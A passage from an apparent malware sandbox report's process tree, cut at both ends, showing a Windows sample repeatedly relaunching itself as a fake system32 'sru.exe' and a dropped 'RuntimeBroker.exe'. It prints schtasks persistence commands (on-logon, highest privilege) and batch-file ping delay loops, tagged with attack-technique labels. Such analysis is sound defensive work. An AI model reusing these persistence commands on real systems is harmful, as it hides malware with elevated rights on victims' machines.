        "C:\Windows\system32\sru\sru.exe"
        98⤵
        
        PID:3216
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        99⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4688
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        100⤵
        
        PID:4772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YJ15UV5hPTA9.bat" "
        99⤵
        
        PID:1744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        100⤵
        
        PID:2584
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        100⤵
        
        PID:1360
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        100⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1608
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        100⤵
        
        PID:2508
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        101⤵
        
        PID:1640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        102⤵
        
        PID:3664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aZJPD6Pu6RuP.bat" "
        101⤵
        
        PID:1860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        102⤵
        
        PID:952
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        102⤵
        
        PID:2920
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        102⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1056
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        102⤵
        
        PID:4944
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        103⤵
        
        PID:4784
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        104⤵
        
        PID:896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\quPq2sFqNpFu.bat" "
        103⤵
        
        PID:5000
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        104⤵
        
        PID:3208
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        104⤵
        
        PID:3176
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        104⤵
        
        PID:4804
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        104⤵
        Drops file in System32 directory
        
        PID:3248
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        105⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        106⤵
        
        PID:4524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wc4VE7IbA3hl.bat" "
        105⤵
        
        PID:2752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        106⤵
        
        PID:2660
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        106⤵
        
        PID:4600
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        106⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1224
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        106⤵
        
        PID:4844
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        107⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        108⤵
        
        PID:984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1UeFWmlTrc5U.bat" "
        107⤵
        
        PID:856
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        108⤵
        
        PID:1924
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        108⤵
        
        PID:2984
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        108⤵
        
        PID:1460
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        108⤵
        Drops file in System32 directory
        
        PID:2932
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        109⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ApWiMRJVnQTX.bat" "
        109⤵
        
        PID:456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        110⤵
        
        PID:656
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        110⤵
        
        PID:4936
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        110⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3800
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        110⤵
        Drops file in System32 directory
        
        PID:1804
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        111⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3528
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        112⤵
        
        PID:3488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\z3GodUZwOG4Z.bat" "
        111⤵
        
        PID:2648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        112⤵
        
        PID:852
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        112⤵
        
        PID:4796
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        112⤵
        Runs ping.exe
        
        PID:2880
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        112⤵
        Drops file in System32 directory
        
        PID:1884
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        113⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:1876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\K7MTgZiCZzrR.bat" "
        113⤵
        
        PID:3852
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:1160
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        114⤵
        
        PID:1156
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        114⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2920
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        114⤵
        
        PID:4540
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        115⤵
        
        PID:4752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\biAEUrFS4YFh.bat" "
        115⤵
        
        PID:3340
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:920
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        116⤵
        
        PID:3132
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        116⤵
        Runs ping.exe
        
        PID:4492
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        116⤵
        
        PID:2664
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        117⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LKoReBTn7EAg.bat" "
        117⤵
        
        PID:1288
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        118⤵
        
        PID:3920
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        118⤵
        
        PID:1012
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        118⤵
        
        PID:2144
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        118⤵
        Drops file in System32 directory
        
        PID:4332
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        119⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        120⤵
        
        PID:1460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\17oLu4wEw0RH.bat" "
        119⤵
        
        PID:3600
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        120⤵
        
        PID:900
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        120⤵
        
        PID:4256
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        120⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4492
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        120⤵
        
        PID:3264
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        121⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        122⤵
        
        PID:412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7fQYqFvuQWLq.bat" "
        121⤵
        
        PID:332
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        122⤵
        
        PID:4804
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        122⤵
        
        PID:1324
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        122⤵
        
        PID:4576
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        122⤵
        Drops file in System32 directory
        
        PID:4180
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        123⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        124⤵
        
        PID:4532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PD70kjNJGFck.bat" "
        123⤵
        
        PID:4184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        124⤵
        
        PID:4612
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        124⤵
        
        PID:3692
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        124⤵
        
        PID:1992
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        124⤵
        Drops file in System32 directory
        
        PID:1396
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        125⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1620
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        126⤵
        
        PID:1692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zqHfWZ5tUfii.bat" "
        125⤵
        
        PID:2356
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        126⤵
        
        PID:3004
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        126⤵
        
        PID:2936
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        126⤵
        
        PID:4988
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        126⤵
        Drops file in System32 directory
        
        PID:3100
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        127⤵
        
        PID:2364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fC6yzms7Cwdg.bat" "
        127⤵
        
        PID:2564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        128⤵
        
        PID:2440
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        128⤵
        
        PID:4688
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        128⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3616
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        128⤵
        Drops file in System32 directory
        
        PID:1396
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        129⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Q9I6wnSTclQZ.bat" "
        129⤵
        
        PID:2036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        130⤵
        
        PID:1156
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        130⤵
        
        PID:2540
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        130⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1656
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        130⤵
        
        PID:5036
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        131⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4616
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        132⤵
        
        PID:3768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V85YUrthnXfb.bat" "
        131⤵
        
        PID:3372
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        132⤵
        
        PID:1832
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        132⤵
        
        PID:2240
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        132⤵
        Runs ping.exe
        
        PID:1680
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        132⤵
        Drops file in System32 directory
        
        PID:2796
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        133⤵
        
        PID:3440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        134⤵
        
        PID:3664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24QLrztFM6Tr.bat" "
        133⤵
        
        PID:1156
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        134⤵
        
        PID:3324
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        134⤵
        
        PID:1056
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        134⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3496
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        134⤵
        
        PID:2240
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        135⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2392
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        136⤵
        
        PID:4336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dx2fOAaPKkGa.bat" "
        135⤵
        
        PID:1108
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        136⤵
        
        PID:5020
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        136⤵
        
        PID:3384
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        136⤵
        
        PID:3928
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        136⤵
        Drops file in System32 directory
        
        PID:4216
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        137⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NHkUgFMceD4d.bat" "
        137⤵
        
        PID:2480
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        138⤵
        
        PID:4992
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        138⤵
        
        PID:3520
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        138⤵
        
        PID:2144
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        138⤵
        Drops file in System32 directory
        
        PID:2880
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        139⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        140⤵
        
        PID:2228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uDl7Lk4NWgsl.bat" "
        139⤵
        
        PID:608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        140⤵
        
        PID:4048
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        140⤵
        
        PID:1008
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        140⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1396
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        140⤵
        
        PID:4392
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        141⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        142⤵
        
        PID:1992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ygr01JmoVZ2x.bat" "
        141⤵
        
        PID:2040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        142⤵
        
        PID:2480
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        142⤵
        
        PID:4828
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        142⤵
        
        PID:5060
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        142⤵
        Drops file in System32 directory
        
        PID:4972
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        143⤵
        
        PID:4032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ojqbZsf0eyVe.bat" "
        143⤵
        
        PID:5056
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        144⤵
        
        PID:3596
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        144⤵
        
        PID:2648
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        144⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3784
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        144⤵
        
        PID:3224
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        145⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\K2J25ruveNgc.bat" "
        145⤵
        
        PID:3852
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        146⤵
        
        PID:920
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        146⤵
        
        PID:952
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        146⤵
        Runs ping.exe
        
        PID:4772
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        146⤵
        Drops file in System32 directory
        
        PID:3148
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        147⤵
        
        PID:2572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        148⤵
        
        PID:1396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\quhNVkRqJ6v3.bat" "
        147⤵
        
        PID:5040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        148⤵
        
        PID:2144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        148⤵
        
        PID:4792
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        148⤵
        
        PID:1536
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        148⤵
        Drops file in System32 directory
        
        PID:3000
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        149⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        150⤵
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wf2qfZkzeYtP.bat" "
        149⤵
        
        PID:4808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        150⤵
        
        PID:776
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        150⤵
        
        PID:2364
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        150⤵
        Runs ping.exe
        
        PID:4664
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        150⤵
        Drops file in System32 directory
        
        PID:5088
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        151⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        152⤵
        
        PID:436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dzk8VTREcjaL.bat" "
        151⤵
        
        PID:2096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        152⤵
        
        PID:2216
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        152⤵
        
        PID:72
- - C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3504
  - - C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
      4⤵
      Executes dropped EXE
      PID:4712
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kfFoD8daW7uu.bat" "
        5⤵
        
        PID:1908
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3208
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:2752
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        Runs ping.exe
        
        PID:1556
      - C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        6⤵
        Executes dropped EXE
        
        PID:828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ItcVfyh3N1cq.bat" "
        7⤵
        
        PID:856
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2840
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:1220
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        
        PID:3772
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        8⤵
        Executes dropped EXE
        
        PID:900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\b6Ud4MGL8Kwq.bat" "
        9⤵
        
        PID:1960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:1108
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:4548
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3780
        
